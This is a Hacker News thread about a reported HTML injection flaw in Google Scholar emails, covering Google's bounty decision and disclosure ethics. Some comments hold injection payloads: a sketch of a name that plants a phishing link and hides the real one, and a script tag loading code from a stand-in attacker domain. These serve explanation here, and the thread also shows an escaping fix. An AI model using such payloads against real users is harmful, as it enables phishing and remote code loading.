
Why you should not trust emails sent from Google - tomvangoethem
http://vagosec.org/2013/09/google-scholar-email-html-injection/
======
iamshs
Now compare this with the attitude of their security researcher, Tavis
Ormandy, who bashed Microsoft's lackadaisical approach to fixing bugs and
publicly published 0-days more than once [1, 2, 3, 4]. Google only moved upon
fear of public disclosure, and that despite the researcher being meticulous
and patient.

Also, thank you, Tom, for your patience and for being responsible. I could
not find your name in the Hall of Fame list.

[1] - [http://www.computerworld.com/s/article/9239477/Google_engine...](http://www.computerworld.com/s/article/9239477/Google_engineer_bashes_Microsoft_s_handling_of_security_researchers_discloses_Windows_zero_day)

[2] - [http://www.zdnet.com/google-researcher-publishes-windows-zer...](http://www.zdnet.com/google-researcher-publishes-windows-zero-day-exploit-7000016403/)

[3] - [http://nakedsecurity.sophos.com/2010/06/15/tavis-ormandy-ple...](http://nakedsecurity.sophos.com/2010/06/15/tavis-ormandy-pleased-website-exploits-microsoft-zeroday/)

[4] - [http://www.computerworld.com/s/article/9177948/Google_resear...](http://www.computerworld.com/s/article/9177948/Google_researcher_gives_Microsoft_5_days_to_fix_XP_zero_day_bug)

~~~
lawnchair_larry
That was not done by a "Google Researcher". That was done by an independent
human who happens to also work at Google. And there are valid arguments in
favor of releasing 0day.

~~~
iamshs
And what about Google's dismissive attitude here? The same attitude that
Tavis got fed up with. The motive was to highlight just that. Tavis bashed MS
because he was riled up by their attitude, perhaps because the culture at
Google regarding patching critical bugs was different and moved fast. Well
then, look no further than Tom's post.

Tom was dealt with in nearly the same manner as Tavis describes his ordeal.
Tavis immediately went ahead and published the exploit, but Tom gave them two
weeks, even after persistently _demonstrating_ the criticality of the exploit.

Culture inside corporations is very different from the outward-facing one.
Facebook's behavior recently could be excused partly due to poor wording
(though the onus was on FB), but what is the explanation here?

------
f-
Hey folks,

I am one of the co-founders of the Vulnerability Reward Program at Google.
It's one of the longest-running and most generous programs of this kind: since
2010, we have paid out around $1M in rewards for more than 1,500 qualifying
bug reports in web applications alone. We take great pride in keeping the
process responsive, friendly, and hassle-free.

Of course, it takes just one bad experience to undo much of that. Tom's report
is a valid issue. The reward panel - of which I am a member - decided that it
did not meet the bar for a financial reward. I stand by this decision, but I
think we should have been more forthcoming, precise, and responsive when
communicating that. In other words, I think we messed up.

PS. If you ever run into any problems of this type - or just want a friendly
soul to chat - please do not hesitate to poke me at lcamtuf@google.com :-)

~~~
schackbrian
Tom Van Goethem makes a strong case that this is a security vulnerability and
it does deserve an award. Can you explain why not?

~~~
f-
I think it's a valid security bug report.

We welcome all reports of security vulnerabilities, we try to fix them
quickly, and we credit the researchers - but we offer rewards only for higher-
impact flaws. You can check out this page for more info:

[http://www.google.com/about/appsecurity/reward-program/](http://www.google.com/about/appsecurity/reward-program/)

In this context, phishing issues are tricky. Because many of our products
simply _have_ to do things such as displaying snippets of potentially
attacker-controlled text and multimedia, we try to evaluate phishing concerns
on a case-by-case basis. In essence, we ask ourselves how easy it would be to
exploit a particular behavior to mount a convincing attack.

My take on this bug is that the attack vector is severely constrained in well-
behaved e-mail clients; and that in badly-behaved clients, the existing
exposure is already considerably worse than any incremental hazard caused by
this flaw. It's valid and worth fixing - but does not quite meet the bar for
the reward tiers set up for higher-impact bugs.

~~~
dasil003
So chuck him a C note and move on. I don't think it's worth the bad PR to
quibble over what is clearly a security bug, no matter how minor. HTML
injection is sort of like the bike shed of security vulnerabilities: every web
developer understands it, so you'll get a perverse amount of attention and
discussion on it.

~~~
f-
In essence, we have a reward structure that we think is internally consistent,
attracts the right sorts of research, and makes optimal use of our resources -
and we try to apply it fairly.

Here, we handled the communications poorly, and I think it's OK to call us out
on that. In fact, I think it would be wrong to offer a reward in hopes of
buying silence from the reporter :-)

------
zmmmmm
No matter what he tried to explain, they just kept replying that he didn't
qualify for the reward. It sounds like they have become super defensive about
acknowledging bugs because the reporter will immediately try to claim a
reward. If so, it's the exact opposite of the intent of the program.

I once reported a Chrome crash that occurred when I tried to load a
65536x65536 bitmap image. Since it was a crash, I of course claimed it was a
security issue, in the hope that that was enough to get a reward. They didn't
accept that, of course, but it does make me think the other side of this
issue may be that Google is now receiving so many of these reports that they
are unable to properly evaluate them all and are applying the "HR" solution
(employing someone underqualified explicitly to fob off as many people as
possible so that only super-qualified candidates get through).

~~~
justinschuh
I can assure you that Google takes VRP reports very seriously. Two members of
Google security (f- and adobkin) have provided context elsewhere in this
thread on the bug described in the post.

As for the Chrome report you mention, if you provide the bug ID I can check.
However, given your description, it definitely seems like the bug was closed
because you were observing the intended behavior of terminating the renderer
process on an out-of-memory condition. The bug reporting form links to
guidelines on reporting security bugs, and explains why this specific case is
not a security issue: [http://www.chromium.org/Home/chromium-security/reporting-sec...](http://www.chromium.org/Home/chromium-security/reporting-security-bugs#TOC-Signs-A-Crash-Is-Not-A-Security-Bug)

~~~
vog
_> As for the Chrome report you mention, if you provide the bug ID I can
check._

This demonstrates exactly what's wrong with Google's interpretation of
"openness". Sure, if one finds some Google insider, one may get information.
Normally (read: in almost all other bigger Free Software projects), one could
simply have a look at the bug tracker on one's own, without being at the
mercy of Google.

~~~
justinschuh
I asked for the bug ID so that I could verify it was triaged properly, not
because the report isn't public. Some reports (like security bugs) are
initially private, as is typical in any open source project. However, security
bug reports are made public as well at some point after they're resolved.

You can go ahead and see for yourself:
[https://code.google.com/p/chromium/issues/list](https://code.google.com/p/chromium/issues/list)

~~~
mpyne
For example, the KDE security mailing list is _definitely_ private, and some
KDE bugtracker bugs are private as well.

------
kevingadd
Arbitrary content injection into signed emails from Google, and it's not a
security risk??? Incredibly poor response from them. Props to the author for
being patient and trying multiple times to convince them to actually fix it.

~~~
oakwhiz
It's too bad that Google decided that he didn't deserve compensation for
reporting this security vulnerability.

~~~
Zoomla
start a crowd-funded reward like the one reported at
[http://www.theinquirer.net/inquirer/news/2290380/crowdfunded...](http://www.theinquirer.net/inquirer/news/2290380/crowdfunded-reward-lined-up-for-zuckerberg-s-facebook-wall-hacker)

~~~
icebraining
I'd rather pressure Google into delivering on their promise. But then again, I
don't use Gmail.

~~~
thedufer
What does Gmail have to do with it? It was the way Google Scholar was building
emails that was at fault, right?

~~~
icebraining
Right. And Google Scholar is part of Google.

------
roel_v
Here's an honest question: why do people still bother with the 'responsible
disclosure' nonsense? What's in it for them? Days of work, weeks of waiting
and frustration, for a 'mention' in some imaginary 'hall of fame'? $1mm over
1500 bugs, that's $666/bug. That's about a day's worth of work if your rates
are low and you are in a low-CoL area, or half a day or less if you work for
Google.

I take it that people who find these vulns do it for fun, even if it's their
job - if you don't have a contract to start looking for issues, there is no
reason to do so other than fun. So the only reason people bother with
'responsible disclosure' is, as far as I can tell, because not doing so would
damage their public persona. But it only got to that point because big vendors
pushed the moral superiority of 'responsible disclosure' on us over the last
decade. Back in the 1990's (when I was last sort of active in the scene),
nobody would think of giving vendors weeks or months of time to fix their own
damned bugs - if your PoC exploit worked at 3am (with real, working shell
code, none of that 'call ::MessageBox(NULL, "U got 0wned")' nonsense), you'd
post it to bugtraq at 3:15 so that you could see the responses when you got
out of bed in the morning.

~~~
probably_wrong
I think it's fairly simple: if you get Google to accept that there's indeed a
problem, they'll fix it and 100% of the possible victims of this exploit are
now safe. If you disclose it non-responsibly, you are letting a pretty big
crowd know there's a problem, while leaving a time window open for them to
exploit it and pretty much assuring that someone will get "0wned". By
disclosing responsibly, you are making sure that the least possible number of
users are affected.

It's not about the hall of fame. It's about making the web a safer place.

~~~
roel_v
Okay, maybe it says something about me as a person, but I can't quite
understand that as a reason. I mean, I understand why people volunteer at a
soup kitchen, but not this. Why would somebody go out to protect some unknown
people on the internet from the mistakes of a for-profit company that is
probably screwing over those same people, and themselves, in 100 other ways?
I'm not anti-corporation or anything like that, but I do recognize that they
are looking out for themselves (as is their right); I don't understand why
everybody who deals with them in some way or another doesn't do that, too.

Plus - the fastest way of getting a vuln fixed is by having it out in the
open, hopefully in a way so public that the affected companies' PR department
needs to get involved. That at least incentivizes them to proactively look for
issues, rather than set up a security@ alias, hire some well-known names from
the scene to fix issues sent there and calm the pocket protector crowd when
shit hits the fan ( _cough_ , ctrl-f this page for examples), and pay
reporters a fraction of the market value of their work (if anything at all).

~~~
nostrademons
I suspect that for most security bugfinders, the people they are protecting
are not the giant corporations, it's the grandmas whose computers will be
pwned within about a day or two of a 0-day hitting the open market. The number
of people who read security blogs is minuscule compared to the number of
people who use products with security flaws. You are not going to convince
most of the latter to read vulnerability reports, but they're the ones who
get hurt when a bug makes it out into the open unreported.

------
jrochkind1
Maybe they can justify thinking it wasn't really a security vulnerability, or
maybe they can say, hey, everyone makes mistakes, we didn't realize it was a
security vulnerability.

But what the heck is the justification for deciding it's a security
vulnerability that needs to be fixed only when the guy says he's going to
advertise it publicly? What the hell is that?

If he had sold it privately, without telling Google, instead of letting them
know he'd be advertising it publicly -- then it still wouldn't be worth
fixing?

~~~
iamshs
This peeved me a lot too, as everybody in my lab, in fact the whole research
floor, has Google Scholar accounts, including my professor. Phishing of
researchers through an email officially sent by Google, to researchers'
official emails, would have had repercussions. Excerpts from the email
exchange described in the article:

1. Additionally, as you said you can register google-scholar.com and phish
from there as well.

Yes, you can do it that way too, but now the link to that domain would have
been provided through a Google-sanctioned email. Driving traffic to that
domain on its own vs. via a phishing email through the author's vulnerability
would have a different impact.

2. we do not believe that there is a security sensitive change that needs to
be done here.

Wow. Security researchers at corporations, professionally working to secure
products. This vulnerability was passed on to Kevin after being vetted by
Aleksandr. Maybe the team works on more potent vulnerabilities.

~~~
mathias
Some more points:

3. Since these emails are sent by the Google Scholar back-end, through
Google’s legitimate servers, such a phishing mail would be more likely to
bypass email client spam filters (compared to, say, an attacker registering
google-scholar-hax.net and sending phishing emails from there).

4. The affected emails would still have Google’s DKIM email signature,
proving that it was sent by Google (which would be impossible from a custom
attacker-controlled domain). In other words, an attacker could send an email
containing any HTML he wants, to any academic email address, and Google still
puts a stamp on it saying “this is legit”.
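To make point 4 concrete, here is a toy model of the signing step (Python;
HMAC stands in for DKIM's actual RSA signing, and the key and names are
invented for illustration). Because the signature is computed over the
finished message body, content injected into the template *before* signing
verifies as authentic sender content:

```python
import hashlib
import hmac

# Stand-in for the sender's DKIM private key (hypothetical value).
SENDER_KEY = b"hypothetical-dkim-private-key"

def sign_body(body: bytes) -> bytes:
    # DKIM signs a canonicalized form of the body with the sender's key;
    # here we model that with an HMAC over the raw body.
    return hmac.new(SENDER_KEY, body, hashlib.sha256).digest()

def verify(body: bytes, signature: bytes) -> bool:
    return hmac.compare_digest(sign_body(body), signature)

# The injected phishing markup is already part of the body when the
# sender signs it...
body = b"<p>Mr Test<a href='http://evil.example'>reset your password</a></p>"
signature = sign_body(body)

# ...so the recipient's signature check passes: the mail really did
# come from the legitimate servers.
assert verify(body, signature)
# Tampering in transit, by contrast, would be detected:
assert not verify(body + b"tampered", signature)
```

The point of the sketch: DKIM only proves who sent the bytes, not that the
bytes are benign, so injection on the sender's side inherits the signature.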

------
kintamanimatt
I don't understand this pervasive mentality among companies that run such a
cash-for-bugs scheme. Isn't the idea to encourage people to properly report
bugs by rewarding them financially, thereby discouraging them from selling the
details to the highest unrelated bidder?

All Google is doing is damaging its reputation.

------
turing
I definitely commend the author for his work, but I think that there might
have been a slight misunderstanding here. In his last email, the author talks
about how public disclosure would "force" Google to fix the vulnerability. But
I read Google's response as simply saying that they did not think the bug
qualified for the program, not that they didn't intend to fix it. Then again,
my reading is definitely influenced by my time at Google and how seriously my
team took this sort of thing.

~~~
iamshs
"we do not believe that there is a security sensitive change that needs to be
done here." - Google's Kevin.

I think this means Kevin said they are not going to change the code on their
end.

Also, author stated: "Even if this vulnerability doesn’t qualify for a reward,
I strongly believe that it should be fixed promptly to protect end users."

Do I read the intent behind this correctly? Please do correct me. Because, to
be frank, my labmate and I are peeved right now about this. Google Scholar is
a functional way to spread awareness of one's own research, but Google's
response got on my nerves pretty badly.

~~~
turing
I think that quote could also be interpreted as saying that Google simply
didn't see it as a change that qualified for the program, not that they
weren't planning on fixing it. But again, I could be entirely wrong; I have no
experience with either the team or the program. I just have a hard time
imagining any of the engineers that I know there getting assigned a bug like
this and clicking 'working as intended - will not fix'.

~~~
iamshs
Then I would ask: why is this vulnerability not up for monetary compensation?

[http://www.google.ca/about/appsecurity/reward-program/](http://www.google.ca/about/appsecurity/reward-program/)

It is a script that allows one to control the behavior (in a limited, yet
authentic, way) of Google's web property.

Why did they say that this was not a security sensitive issue? And why did the
tone change upon seeing public disclosure looming?

Anyway, I am not happy about the handling of this situation. Good on Tom for
being responsible, so that the exploit did not wander into irresponsible
hands. Because, within a day, everybody on Google Scholar could have got this
exploitable email.

------
r0bbbo
I think I might be missing something - as a Google service user, I'd have to
update my own name to be Mr Test<!--BAD STUFF HERE in order to perform a
phishing attack on myself?

~~~
pudquick
What you're missing is that the email was generated and sent by Google to the
new email address that the author of the article was changing his account to -
and this was the email that he was able to inject arbitrary HTML content into,
including a link to a third-party domain.

He could have entered _ANY_ email address into the "change my email to" form -
and Google would send an email there.

With suitable preparation work on his profile name, he could essentially have
Google send a custom crafted HTML email to his intended victim - complete with
verified domain sender information (and hiding the actual 'click here to
verify your email' link so that the email address never actually gets
changed).

Getting Google to send phishing emails on your behalf is a pretty big deal.
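The failure mode described above boils down to string templating without
escaping. A minimal sketch (Python; the template, field names, and URLs are
invented, not Google's actual code) of both the bug and the fix:

```python
import html

# Hypothetical verification-mail template: attacker-controlled profile
# data is interpolated into HTML.
TEMPLATE = ("<p>{name} wants to change this profile's email address.</p>"
            "<a href='{url}'>Click here to verify</a>")

def build_email_unsafe(name, url):
    # Bug: fields are pasted into the HTML body verbatim.
    return TEMPLATE.format(name=name, url=url)

def build_email_safe(name, url):
    # Fix: escaping attacker-controlled fields neutralizes the injection.
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           url=html.escape(url, quote=True))

# The injected "name" adds an attacker link, then opens an HTML comment
# that swallows the rest of the template, hiding the real verify link.
name = ('Mr Test<a href="http://evil.example/login">'
        'Re-enter your password</a><!--')
unsafe = build_email_unsafe(name, "https://scholar.example/verify")
safe = build_email_safe(name, "https://scholar.example/verify")
```

In the unsafe rendering the victim sees only the attacker's link; in the safe
rendering the same input shows up as harmless literal text.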

~~~
prawn
Chinese spammers are abusing Picasa galleries to spam people now. Couldn't
find a way to report that and never heard back from them on Twitter. Marking
the emails as spam doesn't stop more making it through. (Actually, marking as
spam seems to do SFA.)

~~~
coolnow
I just got spam via a Google calendar event. Basic 419, location in Syria and
lots of weapons and money was involved. Followed the link through Sandboxie,
ended up actually at Google Calendar, marked as spam and went on with my day.

------
cryptbe
Wow. Give me a break, please. What the OP reported was a super minor issue,
and he's already got what he deserves.

His bug allowed him to inject links into verification emails sent by Google
Scholar. He claimed that he could inject CSS links too, but that didn't make
this problem any worse. Why? Because it's up to mail clients to load the
linked CSS stylesheets or not. Gmail, for example, would never load those
remote CSS files. If your webmail client does that, it's time to switch to a
better one.

So he could inject links, which is annoying, but still a very minor issue. It
may make phishing a bit easier, but, you know, phishing has always worked
against the average Joe if you try hard enough. That means this problem
doesn't really give an attacker any advantage he couldn't get by himself.

Disclaimer: I'm a member of the team that handles VRP.

~~~
crygin
> If your webmail client does that, it's time to switch to a better one.

Academic users constitute an audience that's quite often bound to use a
single, potentially-outdated webmail system. In our experience,
academic/University users are utilizing what we consider "nonstandard" email
systems with an order of magnitude more regularity than nonacademic users. You
may wish to better understand the audience of the product before asserting
that they should "switch".

And claiming something is not a security issue because you're trusting a
client you don't control to behave well is naive at best, and apologist at
worst. It's genuinely upsetting to hear coming from someone who classifies
vulnerabilities.

~~~
cryptbe
I didn't say that I trust mail clients. I said mail clients shouldn't accept
arbitrary HTML markup and tags in emails. That's a serious problem that needs
to be addressed, regardless of whether Google Scholar is exploited to send
emails with arbitrary links or not.

~~~
yinso
The onus is still on Google - the rule of the web is that any client one
allows connections from is fair game that one has to address.
~~~
Nitramp
If you were using an email client that executes arbitrary HTML, you'd have
been owned a long time ago anyway. That'd be like using a browser that
doesn't have any cross-domain security boundary - it's just not a realistic
attack vector; these things don't exist. Or do you know an email client that
actually interprets JS?

~~~
yinso
You don't need to execute JS in order to phish, as the original link alludes
to with the HTML comment trick.

This particular comment thread was mostly about webmail clients. But to
answer your specific question: take a look at the link for an incomplete
list of email clients that run JS.

[http://en.wikipedia.org/wiki/Comparison_of_email_clients#Tem...](http://en.wikipedia.org/wiki/Comparison_of_email_clients#Templates.2C_scripts_and_programming_languages)

------
benatkin
I don't see the author's name in the linked Honorable Mentions page. Did
someone from Google pull it because they didn't like this blog post? Searched
for "tom", "Mathias", and "vago". No recent results for any of these search
terms.

~~~
tomvangoethem
I was expecting them to put my name up there by the time I posted the blog;
it should be there in the near future though...

~~~
frozenport
Yes, but you also expected them to pay more attention to your exploit?

~~~
benatkin
He's there now. Apparently they did a bulk update. It went from having 0
people named Tom on the whole page to having two people named Tom!
[https://www.google.com/about/appsecurity/hall-of-fame/distin...](https://www.google.com/about/appsecurity/hall-of-fame/distinction/)

------
moloch
You should not trust emails.

~~~
kamjam
I thought it was going to be about emails sent through GMail, but good catch
and well done to Tom.

------
thrownaway2424
It looks like your options for formatting the content are pretty limited and
you can't change the subject line nor the preamble about Google Scholar, so
you wouldn't be able to, say, masquerade as a password recovery email or
anything like that. Still, I personally feel like any content injection should
be treated seriously.

~~~
tomvangoethem
I agree on the subject line (which is "Verify your email address") and that
the mail is sent from "Google Scholar Citations", but as it was possible to
include arbitrary CSS files, the content could be changed to pretty much
anything... Although there was a length restriction on the user's name, there
were two other fields that weren't escaped properly and thus could be used to
insert more HTML content.

~~~
smtddr
_> Although there was a length-restriction on the user's name_

As long as any field allows enough chars to:

<script src="http://evilbadpersondomain.com/forTheLulz.js"></script>
....anything is possible from there.

~~~
RKearney
There are email clients that execute JavaScript?

~~~
smtddr
Ah, yeah, smartphone and desktop apps don't do JS (afaik) - but web-browser
access is still big. If Gmail's web interface went down for a day, I think a
lot of people would notice.

~~~
nitrogen
Gmail doesn't run JavaScript in e-mails, though.

~~~
tictac
I am not sure - when you paste enough JS code into a Gmail compose window, it
will crash.

~~~
nitrogen
My guess: the WYSIWYG editor uses its own HTML parser and filter, written in
JavaScript, that has some O(n^_terrible_) corner case that your paste test is
hitting.

------
wahsd
Re: the current discussions of security and code review in light of the NSA
and other government entities corrupting standards. If Google and Facebook
cannot find such simple errors, and then even balk at implementing a fix,
which turns out to reveal an even larger flaw, what hope is there?

